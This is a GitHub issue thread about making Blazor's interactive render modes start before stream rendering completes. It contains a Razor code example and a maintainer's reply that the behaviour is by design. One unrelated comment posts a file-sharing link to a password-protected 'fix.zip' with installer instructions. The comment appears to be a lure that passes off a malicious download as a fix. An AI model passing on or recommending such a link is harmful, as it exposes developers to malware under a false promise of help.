### ISSUE TITLE
[Blazor] Activate InteractiveServer/InteractiveWebAssembly as soon as possible during StreamRender

### ISSUE THREAD

**Issue by audacode** [dotnet/aspnetcore#57525]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Is your feature request related to a problem? Please describe the problem.

.NET 10 Planning:  We currently do not enable the Blazor Interactive modes until StreamRendering has completed.  After we improve the diffing/patching algorithm we should enable InteractiveServer and InteractiveWebAssembly as early as possible.

### Describe the solution you'd like

When using StreamRender, where the page includes an InteractiveServer or InteractiveWebAssembly component, it appears the interactive mode(s) do not start until completion of the OnInitializedAsync on the stream rendered page.

Blazor generally has a superior model to frameworks like React 19 with React Server Components.  Blazor implicitly does what React Server Components require you to do explicitly with extra work.  However, the React solution allows client rendered components to start up before the Server Rendered Components finish streaming.  

For this scenario, Blazor could be better than React in all aspects, but this current limitation with Blazor means in some cases it will not have as nice a page load experience compared to React.  Look at this example:
```razor
@page "/demo"
@attribute [StreamRendering]
<SubComponent Name="@name" @rendermode="InteractiveWebAssembly" />
@code {
    string? name;
    protected override async Task OnInitializedAsync()
    {
        await Task.Delay(10000);
        name = "Jim";
    }
}
```
SubComponent will initially be rendered on the server (as expected), however the InteractiveWebAssembly mode (or InteractiveServer) will not start until the above OnInitializedAsync method has completed, causing a delay of 10 seconds until interactivity commences.

The Interactive components (such as SubComponent above) should ideally start as soon as possible, even though the StreamRendered page has not finished executing OnInitializedAsync.  Serializable parameters should continue to be passed to the interactive components via the OnParametersSet / OnParametersSetAsync overrides during the completion of the StreamRendered pages OnInitializedAsync method, providing a StateHasChanged has been called before a task is awaited.

### Additional context
EDIT: I note this issue appears to apply on a first page load, not on an enhanced navigation.  
_No response_

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by javiercn** [comment]
@audacode thanks for contacting us.

This is not possible and by design. The render needs to complete before we are able to activate the components, otherwise features like persistent component state can't work.
